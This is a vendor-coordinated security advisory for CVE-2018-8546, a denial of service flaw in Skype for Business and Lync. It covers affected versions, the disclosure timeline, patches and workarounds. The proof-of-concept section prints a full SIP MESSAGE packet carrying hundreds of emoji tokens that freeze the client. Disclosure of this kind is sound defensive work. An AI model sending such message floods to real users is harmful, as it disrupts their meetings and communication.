Denial of Service Vulnerability in Microsoft Skype for Business / Lync

Project Description

SEC Consult also published a blog post regarding the identified security issue with further background information.


Vendor description

“Skype for Business (formerly Microsoft Office Communicator and Microsoft Lync) is an instant messaging client used with Skype for Business Server or with Skype for Business Online (available with Microsoft Office 365). Skype for Business is enterprise software.”

Source: https://en.wikipedia.org/wiki/Skype_for_Business

Business recommendation

Assess the impact of this vulnerability on your business. The patch provided by Microsoft should be installed immediately. Especially if Skype for Business is being used for external communication.

Vulnerability overview/description (CVE-2018-8546)

A large number of emojis (e.g. ~800 kittens) received in one message by the Skype For Business client freezes the program for a few seconds. This can be exploited to perform Denial of Service attacks against Skype for Business users and compromises the availability of the program.

For example, an attacker can continuously send such messages to the chat window of a meeting room in order to freeze the program for all participants and prevent them from using the chat or seeing the video.

Note that the sound and video stream is handled by a separate thread and therefore are not affected (e.g. killed), only the functions related to graphical user interface become unusable.

Proof of concept

After sending a big amount of emojis (~800 kittens) to a Skype for Business chat, the program freezes for a few seconds while rendering the chat window. Continuously sending emojis will make the GUI unusable for the user. Ongoing conference calls are not affected or interrupted.

The following SIP packet illustrates the attack.

MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu SIP/2.0
Via: SIP/2.0/tls 127.0.0.1:7490
From: <sip:lyncdummy@*redacted*>;tag=82254700;epid=e67b0162bec8
To: <sip:xxx@*redacted*>;tag=5c302cb624;epid=15347556e6
Max-Forwards: 70
CSeq: 12 MESSAGE
User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0)
Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x
Route: <sip:*redacted*:5061;transport=tls;opaque=state:T:F:Eu:Ci.R5a4100;lr;ms-route-sig=ey6XhfVINhLjEiZxqAoCWXcGmObktXoI0nG0AvGmdXYEuYRT6e8Utq9wAA>
Contact: <sip:lyncdummy@*redacted*;opaque=user:epid:cfMFfITMsFCxsLbx1gL31gAA;gruu>
Content-Type: text/plain; charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA
Content-Length: 4420
Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications Service", targetname="*redacted*", crand="1126134f", cnum="29", response="*redacted*"

(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)

Vulnerable / tested versions

The following versions have been identified as vulnerable which were the latest versions available at the time of the test:

  • Lync 2013 (15.0) 64-Bit part of Microsoft Office Professional Plus 2013
  • Skype for Business 2016 MSO (16.0.93).64-Bit.

Both versions were running on Windows 10 Pro. According to the vendor, all previous versions are affected:

  • Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
  • Skype for Business 2016: before v16.0.4756.1000

Vendor contact timeline

2018-08-02:Vulnerability details submitted to Microsoft, MSRC Case 47060 assigned.
2018-08-28:Asking for a status update.
2018-08-30:Vendor: issue has been reproduced, solution to block the user provided
2018-08-31Follow-up questions why DoS is not categorized as security issue as the provided workaround is not effective for attacks already in progress.
2018-08-31Vendor: decided to fix the issue, rollout planned for early October.
2018-09-03Agreed to release advisory after mid October.
2018-10-10Asking for a status update.
2018-10-10Microsoft: Issue has been fixed on October 2nd, CVE number will be assigned soon.
2018-10-10Asking for affected versions, advisory notes
2018-10-10Microsoft: KB #4461446 and #4092445.
2018-10-10Reviewing KB articles, asking Microsoft why there is no mention of the security fix in #4092445.
2018-10-11Microsoft: there was a mistake, the patch needs to be re-released as security fix, agreed on postponing until next Patch Tuesday in November.
2018-10-13CVE number CVE-2018-8546 issued on Patch Tuesday.
2018-11-14Coordinated release of security advisory.

Solution

Apply the security patches provided by the vendor. The fixed versions are:

  • Skype for Business 2015 (Lync 2013) version 15.0.5075.1000
  • Skype for Business 2016 (KB4092445) version 16.0.4756.1000

Microsoft provided the following links for further information:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8546

https://support.microsoft.com/en-us/help/4461446/october-2-2018-update-for-skype-for-business-2015-lync-2013-kb4461446
https://support.microsoft.com/en-us/help/4092445/october-2-2018-update-for-skype-for-business-2016-kb4092445

 

Workaround

Disable emoticons in Skype for Business:
Tools -> Options -> IM -> Show emoticons in messages

Or block the user performing the DoS attacks by right-clicking on the contact
and “Change Privacy Relationship”, then click “Blocked Contacts”
(of course this will only work when there is no active DoS attack)

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

 

EOF Sabine Degen / @2018

 

 

Interested to work with the experts of SEC Consult? Send us your application.
Want to improve your own cyber security with the experts of SEC Consult?
Contact our local offices.

Project Details

  • TitleDenial of Service
  • ProductMicrosoft Skype for Business 2016 / Lync 2013
  • Vulnerable versionMicrosoft Skype for Business 2015 (Lync 2013) before v15.0.5075.1000 Skype for Business 2016: before v16.0.4756.1000
  • Fixed versionMicrosoft Skype for Business 2015 (Lync 2013) v15.0.5075.1000 Skype for Business 2016 v16.0.4756.1000
  • CVE numberCVE-2018-8546
  • ImpactMedium
  • Homepagehttps://www.skype.com/en/business/
  • Found08/2018
  • BySabine Degen (Office Vienna) | SEC Consult Vulnerability Lab

Cookie Preference

Please select an option. You can find more information about the consequences of your choice at Help.

Select an option to continue

Your selection was saved!

Help

Help

To continue, you must make a cookie selection. Below is an explanation of the different options and their meaning.

  • Accept all cookies:
    All cookies such as tracking and analytics cookies.
  • Accept first-party cookies only:
    Only cookies from this website.
  • Reject all tracking cookies:
    No cookies except for those necessary for technical reasons are set.

You can change your cookie setting here anytime: Blog. Blog

Back